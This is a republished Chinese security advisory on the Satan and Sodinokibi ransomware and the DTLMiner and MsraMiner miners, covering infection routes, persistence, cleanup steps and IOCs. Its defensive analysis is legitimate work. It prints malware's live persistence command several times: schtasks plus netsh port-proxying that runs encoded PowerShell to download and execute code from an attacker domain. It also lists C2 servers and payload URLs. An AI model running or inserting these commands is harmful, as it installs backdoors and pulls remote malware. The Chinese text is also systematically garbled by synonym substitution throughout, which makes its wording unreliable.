您的方位:主页>>电脑软件

挖矿勒索两开花:安全狗提示用户留意防备勒索病毒

发布时刻:2019-05-28 11:54:54  来历:互联网    布景:
fun88

  防护千万条,安全第一条;补丁没打全,中毒两行泪。

  近来,安全狗海青实验室接到多起客户中毒求助,经安全研究人员剖析,这些病毒感染的途径90%以上都是“永久之蓝”缝隙和弱口令爆炸。

  自2017年NSA”武器库”被黑客安排”影子经纪人”走漏以及WannyCry勒索病毒的迸发,“永久之蓝”便是一个经年累月的论题,直到2019年的今日,还有许多主机由于“永久之蓝”缝隙感染病毒。

  2019年4-5月,咱们所触摸以及处理的病毒大多运用永久之蓝缝隙进行传达,而在没有打过补丁的机器中,往往有多种病毒一起存在,”前史包袱”严峻。不只如此,近期的挖矿木马和勒索病毒为了对立杀毒软件,更是频频迭代新版别,为了抢占受害者的”算力商场”,黑客怕是早已进入了”996”。

  总的来说,以安全卫道,任重而道远。

  依据近期应急支撑作业总结的状况,咱们把遇到的问题首要分为两大类来谈论:勒索病毒和挖矿木马。

  勒索病毒

  此次发现的勒索病毒除了运用经典的永久之蓝缝隙和弱口令爆炸感染外,还运用多个中间件NDay对互联网主机进行进犯。咱们在发现病毒后第一时刻宣告勒索病毒预警:【安全预警】警觉!Satan勒索病毒新变种东山再起、【高危安全预警】Sodinokibi勒索软件感染Windows服务器预警

  Satan勒索病毒

  2019年4月中旬,海青实验室接到客户求助,并截获到Satan勒索病毒最新变种。该变种病毒会针对Windows体系和Linux体系进行无差别进犯。

  Satan病毒在Windows电脑/服务器中,运用永久之蓝缝隙对局域网Windows电脑进行进犯,一起进犯模块运用JBoss、Tomcat、Weblogic、Apache Struts2多个组件缝隙以及Tomcat弱口令爆炸对Windows、Liunx服务器进行进犯。病毒进犯模块在对方针主机进犯成功后,将针对方针操作体系到C2下载勒索病毒主体,并对文件进行加密。现在已有多家企业中招。

  病毒进犯模块对主机进犯成功后,判别方针主机操作体系类型,其次到服务器(111.90.159.106)下载相应病毒主体。Windows体系将病毒文件放在C:\\fast.exe,linux体系病毒主体在/tmp/r.sh。下载成功后履行病毒文件。

  病毒履行后将对本地文件加密,并对局域网主机进行横向感染。勒索信选用中文编写,看来黑客首要勒索方针是我国用户。勒索信信息如下图:

  日志溯源:

  查看jboss日志,发现从2019-04-xx 02:55:51开端一向有歹意运用jboss缝隙的exp在对中毒机器进行进犯:

  开端剖析,最终运用成功的应该是一个jboss反序列化缝隙:

  进犯成功后,上传jsp文件satan.jsp。该文件如上文:依据体系从c2下载勒索软件本体并履行

  防备办法:

  关于勒索病毒,咱们只能尽量防备。由于一旦中招,除了付出赎金,能解密的几率十分小,因而防备和中毒后的处理是要点。

  1、及时晋级操作体系安全补丁,晋级Web、数据库等服务程序,防止病毒运用缝隙传达。

  2、JBoss、Tomcat、Weblogic、Apache Struts2等服务器组件即时装置安全补丁,更新到最新版别。

  3、服务器、Tomcat等登录防止运用弱暗码,主张运用“大写字母+小写字母+数字+符号”8位以上暗码。

  4、守时做好重要数据备份。

  IOCs:

  111.90.159.106

  http://111.90.159.106/r.sh

  http://111.90.159.106/f.exe

  fe014fbf44e2b42d70e3effa2248348a

  Sodinokibi勒索病毒

  该病毒宗族最早呈现于2019年4月下旬,其传达和运用办法丰厚,短期内版别更新迭代快。现在应急的客户中,嘉兴、泸州都有中此病毒的事例。

  传达途径

  1).该病毒运用3389弱口令爆炸

  2). 4月底刚宣布的Weblogic长途代码履行缝隙CVE-2019-2725并合作其他nday缝隙对Windows服务器主张进犯

  3). cve-2018-8453 Windows内核提权缝隙进步本身权限

  4).废物邮件传达

  Sodinokibi勒索软件感染服务器成功后会生成文件加密后缀名+readme.txt的勒索信息,勒索信息包含个人的ID序列号,以及歹意软件作者的联络办法。风趣的是开端的曝光者Cisco Talos团队宣布的进犯者勒索信息开端显现的是“Hello Dear friend”,而此处运用的是“Welcome Again”,不扫除进犯者施行进犯的进程中有二次投递勒索软件的行为。

  防备办法:

  1.Weblogic、Apache Struts2等服务器组件及时装置安全补丁,更新到最新版别。

  2.长途桌面防止运用弱暗码,主张运用“大写字母+小写字母+数字+符号”8位以上暗码。

  对重要的数据文件守时进行非本地备份。

  IOCs:

  MD5:e62c896825a6d186f34fb16b1f57490a

  Domain:

  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion

  http://decryptor.top

  挖矿木马

  死灰复燃的DTLMiner宗族挖矿木马

  该宗族病毒自”驱动人生”事情后开端活泼。从侵略“驱动人生”植入挖矿病毒晋级插件到对本身病毒更新频率、耐久化机制的改动、对立杀软的办法来看,咱们以为该团伙是一个“浸透经验丰厚”一起具有较强的反侦查才能的作业黑产团伙。

  咱们来回忆该团伙搞的“大新闻”。

  2018年12月14日,“驱动人生”的晋级模块被不法分子运用传达挖矿木马病毒“DTLMiner”,短期内感染数万台核算机。

  驱动人生晋级推送程序会经过网址链接

  Http://pull.update.ackng.com/calendar/PullExecute/F79CB9D2893B254CC75DFB7F3E454A69.exe

  将病毒下载到本地履行。

  该病毒运转后,将本身开释到System32(或SysWOW64)目录下(C:\Windows\SysWOW64\svhost.exe),将该可履行文件注册为体系服务持续履行歹意代码,注册服务名为Ddriver。

  svhost.exe为永久之蓝缝隙进犯组件,履行之后会对内网具有永久之蓝缝隙和弱口令的主机进行横向传达,并从http://dl.haqo.net 下载进犯组件履行。(下载的文件即为该svhost.exe)。此外,该svhost进程还将收集主机信息,发送到服务器:http://i.haqo.net/i.png。

  除了进犯、感染、信息收集外,此刻该病毒还未触发其他歹意行为,开端估测该病毒归于测验阶段。

  下面将盘点该DTLMiner宗族各版别中对立杀软的办法改动,并给予对应的铲除计划。

  1.1 版别1-文件增肥

  病毒采纳落地PE文件办法,文件名是随机的,木马在生成进程中会在文件结尾填充废物数据,生成50M左右的大文件来躲避特征查杀。

  该木马发动后会在多个体系目录下开释增肥的木马文件,以随机的办法生成的文件名。

  C:\windows;

  C:\Users\admin\AppData\Roaming;

  C:\Users\gouchen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup;

  经过schtasks 创立使命计划:

  schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN <随机名> /tr “cmd.exe /c C:\Windows\<随机名>.exe”

  经过注册表发动项增加开机自启,并把C:/Users/admin/AppData/Roaming目录下的增肥木马当作发动程序:

  HKEY_LOCAL_MACHINE\SOFTWARE\Micrisift\Windows\CurrentVersion\Run

  铲除计划

  删去病毒文件:

  C:\Windows\Temp\sartpg.exe

  %appdata%\Microsoft\cred.ps1

  C:/Windows/随机名.exe

  C:/Users/admin/AppData/Roaming/随机名.exe

  C:/Users/admin/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/随机名.exe

  删去以下计划使命:

  随机名

  cmd.exe /c C:\Windows\随机名.exe

  删去菜单发动项下的病毒文件:

  C:\Users\gouchen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\随机名.exe

  删去注册表中的歹意发动项以及操作文件:

  HKEY_LOCAL_MACHINE\SOFTWARE\Micrisift\Windows\CurrentVersion\Run

  C:/Users/admin/AppData/Roaming/随机名.exe

  1.2 版别2-服务耐久化

  该版别选用服务进行本身耐久化,在缝隙运用成功后,创立随机称号的服务

  相似客户这台机器,被屡次感染后创立了多个随机的病毒服务

  服务的可履行文件途径:

  C:\Windows\system32\cmd.exe /C "netsh.exe firewall add portopening tcp 65530 DNS&netsh interface portproxy add v4tov4 listenport=65530 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""

  运用服务对本身进行耐久化

  铲除计划

  禁用该服务,遍历使命计划(不只仅在\Microsoft\windows\Rass有使命计划),铲除powershell使命计划

  1.3版别3-运用JS脚本履行

  在进犯成功后,病毒在体系发动项开释flashplayer快捷办法,并在

  %appdata%开释flashplayer.tmp文件,该文件内容

  此文件是一个脚本,运用JS 调用PowerShell脚本下载。下载的模块解密后

  别离:设置使命计划,发动耐久化机制,依据体系版别下载powershell挖矿脚本,下载进犯脚本进行横向传达

  铲除计划:

  %appdata%中的flashplayer.tmp文件

  铲除发动项中的快捷办法

  遍历使命计划,和版别2的计划相同,删去powershell使命计划

  1.4 版别4-无文件落地伊始

  该版别选用无文件落地办法在体系进行驻留,病毒感染成功后直接创立如下使命计划

  schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""

  相同的,这些使命计划从黑客服务器中下载代码,并直接履行,传统的静态杀毒引擎并不能查杀它。

  铲除计划:

  遍历使命计划,铲除powershell使命即可

  1.5 版别5-使命计划躲藏

  在版别4的基础上,运用某些windows版别对使命计划xml文件解析过错的bug,用特别字符命名使命计划。导致在图形界面中显现不了该使命计划。

  铲除计划

  要铲除这些使命计划,到体系途径C:\Windows\System32\Tasks或C:\Windows\Tasks中,遍历这些xml文件,找到powershell使命相关的xml,删去。

  1.6 版别6-不知道耐久化

  单个机子新的变种中,有不明进程发动powershell,经过查看该powershell参数,承认这个是病毒发动的。可是这个powershell发动后,履行自退出,并没有进一步感染、挖矿、占用CPU。查看了一些耐久化机制(计划使命、服务、发动项等没发现问题)可是定位不到发动办法。

  尽管该powershell发动后自杀,并没有履行到歹意代码部分,可是不能确保后期不会再次迸发。

  这个powershell 的父进程是 C:\Windows\svchost.exe,可是svchost.exe是体系的服务进程,体系服务依托了使命计划 wmi 等多个体系服务,查看了该PID下依托的服务 都是正常的

  用了360处理,发现360没有对这个进行查杀,可是实时监控powershell发动的参数,对相似如下参数发动的powershell进程进行阻断:

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=

  可行办法:

  经过进程监控,获取powershell参数,判别是否为病毒阻挠其履行。

  1.7全体查杀计划:

  关于有二进制文件落地的版别,用云眼查杀;

  关于没有文件落地的版别:

  遍历服务,禁用服务名为随机字母组成、服务文件途径特征为

  C:\Windows\system32\cmd.exe /C "netsh.exe firewall add portopening tcp 65530 DNS&netsh interface portproxy add v4tov4 listenport=65530 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""

  的服务

  遍历使命计划,铲除powershell特征的使命

  特征如:

  发动次数频频(30-60分钟履行一次)

  Powershell 参数如:-ep bypass -e + base64 编码数据、-hidden 躲藏窗口

  用windows自带的使命计划图形界面程序有时候无法获取彻底的使命计划(如2.3.5),主张运用代码遍历使命计划文件夹C:\Windows\System32\Tasks或C:\Windows\Tasks,经过删去这些xml文件来铲除使命计划。

  铲除注册表

  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

  删去以随机称号命名、数值数据为:

  C:\Windows\System32\config\systemprofile\AppData\Roaming\ + 随机称号

  的注册表键

  关于不知道发动的歹意powershell,经过进程监控,阻断带有歹意参数的powershell进程(歹意参数参阅2)

  IOCs

  IP:

  27.102.107.137

  域名:

  p.beahh.com、v.beahh.com、v.y6h.net、down.bddp.net、p.bddp.net、v.bddp.net、p.zer2.com、p.awcna.com、p.amxny.com

  2. MsraMiner挖矿宗族

  该挖矿木马宗族在本年4-5月份也算是比较活泼的,在应急进程中,DZJ、JX、NJ、LZ项目中都有发现中此宗族病毒的机器。

  该变种运用“永久之蓝”缝隙传达,在传达成功后,母体运转后开释服务模块,开释的服务模块称号随机凑集。例如:ApplicationNetBIOSEvent.dll

  病毒从以下字符串凑集:

  创立服务:ApplicationNetBIOSEvent(不同的机器不同服务名),下放服务装备文件C:\windows\system32\ApplicationNetBIOSEvent.dll

  开释“永久之蓝”进犯工具包到C:\Windows\NetworkDistribution或C:\Windows\SpeechsTracing目录,进犯内网中的其它机器。

  铲除计划:

  该病毒根据windows服务进行本身耐久化,因而首要应禁用服务:

  找到服务,服务为随机凑集名,但也是有迹可循的:

  服务描绘为

  Enables a common interface and object model for the $SERVER_NAME$ to access management information about system update, network protocols, devices and applications. If this service is stopped, most Kernel-based software will not function properly. If this service is disabled, any services that depend on it will fail to start.

  或

  服务名wmassrv(这是比较老的版别,服务名不随机)

  首要找到该服务,在使命办理器点击右键,转到进程。记下进程的PID。禁用该服务,中止该服务,完毕该进程(刚刚咱们记下的进程),完毕svchost.exe *32 。删去或阻隔C:\Windows\NetworkDistribution 下全部文件。阻隔C:\windows\system32\ApplicationNetBIOSEvent.dll

  IOCs:

  MD5:

  befb60b1240d360ca74c25d3637e165e

  95786b6c28bf8dba7bbfeeba9e1ec27a

  总结

  大部分主机由于没及时打上补丁和弱口令问题导致机器中毒,从而导致内网横向传达,形成大批量感染状况。鉴于勒索病毒、挖矿病毒不断更新进犯办法和耐久化机制以对立杀毒软件,以下提出几点有用的防备办法:

  守时对本身办理的服务器进行安全体检,并及时更新缝隙补丁和病毒库。重视安全厂商发布的缝隙预警和病毒预警,对本身财物进行自查。除事务需求服务外,约束其他不必要服务及端口。

  运用安全性高的暗码。许多核算机办理人员并没有意识到自己运用的是弱口令,如暗码带有设备、个人、单位、部分信息;常用英文单词(如Password、key、Huawei、admin)等关键词变型;键盘规则字符(如qaz、qwe、!@#、147)等等都是弱口令。主张运用大小写字母+数字+符号八位以上的字符串(最好是无规则)用作暗码。且激烈不主张多台机器或数据库运用同一暗码,应做到一机一码。

  树立灾备计划。要知道信息安全中,肯定安满是不存在的,关于重要财物应当树立一套完好的灾备计划。例如守时做好数据备份,树立备用服务器,做好主备机器切换战略,守时进行灾备演练。

  约束服务器上的Powershell。黑客常常运用powershell来完结其浸透进犯,而大部分服务器上承载的事务其实用不到powershell。因而,若事务上用不到powershell组件,主张将其封闭或禁用。

特别提示:本网内容转载自其他媒体,意图在于传递更多信息,并不代表本网附和其观念。其原创性以及文中陈说文字和内容未经本站证明,对本文以及其间悉数或许部分内容、文字的真实性、完好性、及时性本站不作任何确保或许诺,并请自行核实相关内容。本站不承当此类著作侵权行为的直接职责及连带职责。如若本网有任何内容侵略您的权益,请及时联络咱们,本站将会在24小时内处理完毕。


本文来历:互联网

本文谈论
友谊提示:谈论功用暂时封闭,请扫描上方二维码进群沟通!
近年来,国产作业功率类软件快速兴起,林林总总的作业功率类软件进入职场,可是,就挑选一款运用方...
日期:08-21
回来网站主页
时光荏苒,岁月如梭,转眼间炽热难耐的夏天现已带着一丝不舍向咱们挥手道别,而“立秋”...
日期:08-21
为国产作业运用正名 万兴PDF专家软件评测
开端,出售办理便是填各种表,后来引进出售办理软件,开端信息化办理。有了移动互联网之后,出售管...
日期:08-20
万兴PDF专家评测:消除PDF文档运用痛点,强壮功用终将 成为“爆款”软件
2019年8月,在蓝色光标AD大会上,妙笔智能公司正式推出了智能撰稿机器人2.0体系。在该体系下,经过"...
日期:08-16
CRM进入作业手机年代 讯众通讯要进入CRM范畴?
现在,正值招聘的黄金时期「秋招季」,各大企业的会集招聘正在炽热打开。怎么能在千百位应聘者中脱...
日期:08-15
妙笔2.0晋级体系不容小觑,快速捉住传达营销新趋势
近来,微博#用手机听音乐时收到语音音讯#这一论题备受重视。信任许多手机听歌收到微信语音时的心里O...
日期:08-09
这个 WPS 高效功用,让你轻松制造高水平简历
“轻量化”,本是轿车生产技能之一,能够做到确保轿车根本功用的状况下,下降分量进步操...
日期:08-09
听音乐时不想收到语音音讯 讯飞输入法语音输入更便利看
8月8日音讯 索泰今日发布了MAGNUS E系列ZBOX迷你PC,62.2毫米厚,搭载9代英特尔酷睿处理器和NVIDIA ...
日期:08-08
“轻量化”成趋势,作业OA体系怎么挑选?
8月8日音讯 旧金山时刻8月7日下午,AMD举行发布会,正式推出了7nm EPYC 7002系列处理器,最高64核12...
日期:08-08
索泰发布新款迷你PC:搭载9代酷睿和RTX显卡
长途操控造为一种新式的互联网操作办法,正在成为一种潮流。
日期:08-07
AMD 霄龙发布会现场实拍:双路EPYC,超大被迫散热器
现在,云核算、大数据、5G、AI人工智能、IoT物联网等新式技能日新月异,现已成为改动日子、工业和社...
日期:08-02
万物互联年代,一款长途操控软件的十年进化之路
信任不少小伙伴们都知道,字体关于PPT制造、宣扬海报设计而言,重要性显而易见,字体若是运用妥当,...
日期:08-02
破解数字化转型的暗码  用友2019全球企业服务大会行将开幕
说到下载电影、游戏、软件等,信任不少小伙伴都想到迅雷,作为一款装机必备的软件,网上也流传着很...
日期:08-02
这个高效神器,让你的PPT字体更美观
2019年7月20日,海纳汇联盟年度全国巡展第六站在杭州成功举行。
日期:07-29
迅雷破解版盘点,VIP破解版无限加速去广告通通不靠谱!
数据显现,
  每位顾客在超市每个终端展现货架前均匀逗留15秒,
  75%的人会在5秒...
日期:07-25
十年远控品牌向日葵露脸海纳汇,助力物联网企业数字化
决议职场人升职加薪的首要因素除老板外,还有你的作业文档。为什么呢?由于这些文档也是你作业效果最...
日期:07-25
货架革新,怎么拿下终端货架高地?
近来,科创板鸣锣开市,第一批25只新股正式在上交所开端买卖,开盘悉数大涨,乃至有的涨幅达520%,上...
日期:07-24
简略3步处理文档丢掉?试试WPS高效作业小好方法《四》
《星球大战》在全球具有数以亿计的粉丝,其天行者系列终章《星球大战9》在前段时刻宣告12月20日在北...
日期:07-15
科创板开市大涨引股民抢投,腾讯手机管家精准查杀5款病毒炒股APP
​二三四五好压自上线以来,因其“小、快、轻、便”的特色,在许多压缩软件中别出心裁。...
日期:07-12
有人打电话喊你出资《星球大战9》,腾讯手机管家精准阻拦欺诈电话
作为 Vue 的初学者,您或许现已听过许多关于它的专业术语了,例如:单页面运用程序、异步组件、服务...
日期:07-08
  专栏介绍
二三四五好压防护文件安全 MD5校验成亮点
王涵 的专栏
王涵宣布的文章
积分:
毛遂自荐 :